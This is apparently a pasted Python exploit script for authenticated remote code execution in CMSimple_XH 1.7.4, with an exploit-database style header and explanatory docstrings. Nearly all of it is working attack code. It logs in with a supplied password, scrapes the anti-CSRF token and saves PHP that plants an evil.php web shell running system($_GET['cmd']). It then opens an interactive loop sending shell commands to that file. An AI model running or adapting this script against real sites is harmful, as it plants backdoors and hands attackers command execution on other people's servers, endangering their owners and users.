Denitsu

Exploit

Jun 2nd, 2023
# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows


# CMSimple_XH is an open source project under the GPL3 license.
# It includes an endpoint that allows remote access.
# The backup page is misconfigured, which causes the security vulnerability.
# Credentials for a user with sufficient permissions are required.

# Example: python3 exploit.py -u http://example.com -p Admin123
  17.  
  18.  
  19.  
  20. from bs4 import BeautifulSoup
  21. from time import sleep
  22. import requests
  23. import argparse
  24.  
  25.  
def main():
    """Parse the command line, print the banner and hand the options to ``host``.

    Both options are required:
        -u/--host      base URL (or bare hostname) of the CMSimple_XH install
        -p/--password  value sent as the ``keycut`` field of the login POST
    """
    arg_parser = argparse.ArgumentParser(
        description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)'
    )
    arg_parser.add_argument('-u', '--host', type=str, required=True)
    arg_parser.add_argument('-p', '--password', type=str, required=True)
    options = arg_parser.parse_args()

    banner = (
        "\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
        "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n",
    )
    print(*banner)
    host(options)
  34.  
  35.  
def host(args):
    """Normalise ``args.host`` and probe it before continuing to ``login``.

    ``args.host`` is rewritten in place: a missing scheme gets ``http://``
    prepended and a single trailing ``/`` is trimmed. The host is then fetched
    with a plain GET; only an HTTP 200 leads on to ``login``. A
    ``requests.ConnectionError`` (raised by the probe or anything further down
    the chain) ends the process with exit status 1. No request timeout is set,
    so an unresponsive host blocks indefinitely.
    """
    has_scheme = args.host.startswith(('http://', 'https://'))
    if has_scheme:
        print("[?] Check Url...\n")
    else:
        print("\n[?] Check Adress...\n")
    sleep(2)

    candidate = args.host if has_scheme else "http://" + args.host
    # Only one trailing slash is trimmed; "host//" keeps one slash.
    args.host = candidate[:-1] if candidate.endswith('/') else candidate

    # Reachability probe; anything other than a 200 stops the chain here.
    try:
        probe = requests.get(args.host)
        if probe.status_code == 200:
            login(args)
        else:
            print("[-] Address not reachable!")
            sleep(2)
    except requests.ConnectionError:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)
  69.  
  70.  
def login(args):
    """POST the password to ``/?&login`` and continue to ``csrf`` on success.

    The form carries ``login=true``, ``keycut=<password>`` and ``submit=Login``
    together with a placeholder ``XH_2f`` cookie. Success is judged purely from
    the HTML: the ``href`` of the ``<link rel="next">`` element is compared with
    "/", and anything else is treated as a logged-in page. If the element is
    absent the subscript on ``None`` raises ``TypeError``. The session value
    handed on is the ``XH_2f`` cookie from the response, which may be ``None``
    when the server sets no such cookie.
    """
    login_url = args.host + "/?&login"
    session_cookies = {"XH_2f": "evil"}
    request_headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": login_url,
    }
    login_form = {
        "login": "true",
        "keycut": args.password,
        "submit": "Login",
    }
    reply = requests.post(login_url, headers=request_headers, cookies=session_cookies, data=login_form)

    session_token = reply.cookies.get("XH_2f")
    page = BeautifulSoup(reply.text, 'html.parser')
    next_link = page.find("link", {"rel": "next"})

    logged_in = next_link['href'] != "/"
    if logged_in:
        print("[!] Login Success!\n")
        sleep(2)
        csrf(args, session_token)
    else:
        print("[!] Wrong password!!\n")
        sleep(2)
  100.  
  101.  
def csrf(args, token):
    """Load ``/?file=content`` as the logged-in session and extract the
    anti-CSRF token, then continue to ``create``.

    The page is requested with ``status=adm`` and the ``XH_2f`` session cookie.
    The token is taken positionally as the ``value`` of the fourth hidden
    ``<input>`` on the page, so any layout change breaks it. Every exception
    raised while parsing or further down the chain in ``create`` is caught and
    printed rather than propagated.
    """
    editor_url = args.host + "/?file=content"
    session_cookies = {
        "status": "adm",
        "XH_2f": token,
    }
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?&settings",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
    }
    reply = requests.get(editor_url, headers=request_headers, cookies=session_cookies)

    try:
        page = BeautifulSoup(reply.text, 'html.parser')
        hidden_inputs = page.find_all("input", type="hidden")
        # Index 3 is a fixed guess at which hidden field holds the token.
        anti_csrf_token = hidden_inputs[3].get("value")
        create(args, token, anti_csrf_token)
    except Exception as err:
        print(err)
  125.  
  126.  
def create(args, token, csrf):
    """Submit ``payload`` through the content editor's save action.

    Sends an authenticated POST (``status=adm`` plus the ``XH_2f`` session
    cookie) to the site root with ``file=content``, ``action=save`` and the
    anti-CSRF token obtained by ``csrf``. The ``text`` field is a PHP snippet
    that writes ``./evil.php`` containing a ``system($_GET['cmd'])`` one-liner;
    the CMS is presumed to evaluate the saved content as PHP, which is not
    visible here. Only the HTTP status is inspected: a 200 proves the POST was
    answered, not that the save succeeded.

    Server-side artefacts: a content-save POST whose ``text`` field contains
    ``<?php``, and a new ``evil.php`` in the web root.
    """
    payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"

    url = args.host
    cookies = {
        "status": "adm",
        "XH_2f": token
    }
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?file=content&action=edit&xh_success=content",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "text": payload,
        "file": "content",
        "action": "save",
        "xh_csrf_token": csrf
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)

    # Status-only success test; a re-rendered editor page also returns 200.
    if (response.status_code == 200):
        print("[!] Create Vuln File!\n")
        sleep(2)
        exploit(args)
    else:
        print("[!] Create Failed!\n")
        sleep(2)
  158.  
  159.  
def exploit(args):
    """Interactive loop: read a command, send it to ``/evil.php?cmd=`` and
    print the response body.

    The command is appended to the query string verbatim and sent as a POST
    with an empty body. An empty response body is reported as
    "command not found". The loop has no exit condition; it ends only when
    ``input`` raises (EOF, Ctrl-C) or a request exceeds the 5 s timeout, which
    is not caught.

    Access logs show repeated requests to ``/evil.php`` with a ``cmd`` query
    parameter and a fixed Firefox 77 User-Agent string.
    """
    print("[+] Exploit Done!\n")
    sleep(2)

    while True:
        cmd = input("$ ")
        url = args.host + "/evil.php?cmd=" + cmd
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
        }

        # POST verb, but the parameter travels in the URL; timeout is 5 s.
        response = requests.post(url, headers=headers, timeout=5)

        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)
  178.  
  179.  
if __name__ == '__main__':
    # Script entry point: nothing runs on import, only on direct execution.
    main()
  182.  